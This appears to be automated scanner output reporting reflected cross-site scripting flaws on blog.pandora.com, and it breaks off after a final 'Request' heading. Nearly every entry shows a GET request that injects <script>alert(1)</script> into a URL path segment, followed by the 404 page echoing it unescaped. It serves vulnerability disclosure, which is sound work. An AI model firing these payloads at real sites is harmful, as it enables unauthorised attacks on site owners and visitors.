HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)</script>950dc27a619 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)</script>af1c2098b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)</script>fcd5b5c5573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)</script>703abccb638 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e5b4<script>alert(1)</script>6e5ab5102c8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/128e5b4<script>alert(1)</script>6e5ab5102c8/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bc67e<script>alert(1)</script>34ab249b04a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabc67e<script>alert(1)</script>34ab249b04a/archives/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9cc4e<script>alert(1)</script>4b764c67cc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 366
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives9cc4e<script>alert(1)</script>4b764c67cc/2010/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bd53e<script>alert(1)</script>7f56f5a8144 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:13 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010bd53e<script>alert(1)</script>7f56f5a8144/12/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 84903<script>alert(1)</script>e925b373d1b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:16 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/1284903<script>alert(1)</script>e925b373d1b/holiday-music.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e86cc<script>alert(1)</script>2286b5dabd7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 367
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/holiday-music.htmle86cc<script>alert(1)</script>2286b5dabd7 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5d3cd<script>alert(1)</script>a8a76e357fe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5d3cd<script>alert(1)</script>a8a76e357fe/archives/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25283<script>alert(1)</script>32ad766d12b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives25283<script>alert(1)</script>32ad766d12b/2010/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ac8ae<script>alert(1)</script>07d5f78715a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010ac8ae<script>alert(1)</script>07d5f78715a/12/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6f003<script>alert(1)</script>c2c8f4a2ec0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/126f003<script>alert(1)</script>c2c8f4a2ec0/themed-stations.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c1b2a<script>alert(1)</script>283fea933c9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/12/themed-stations.htmlc1b2a<script>alert(1)</script>283fea933c9 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2ed28<script>alert(1)</script>2b8c9060753 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:44 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2ed28<script>alert(1)</script>2b8c9060753/archives/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43add<script>alert(1)</script>997001f8093 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives43add<script>alert(1)</script>997001f8093/arizona/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f01a6<script>alert(1)</script>b621b2a3f06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/arizonaf01a6<script>alert(1)</script>b621b2a3f06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 70767<script>alert(1)</script>cc798d55c4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:58 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora70767<script>alert(1)</script>cc798d55c4c/archives/california/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d529c<script>alert(1)</script>b54dc99c7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
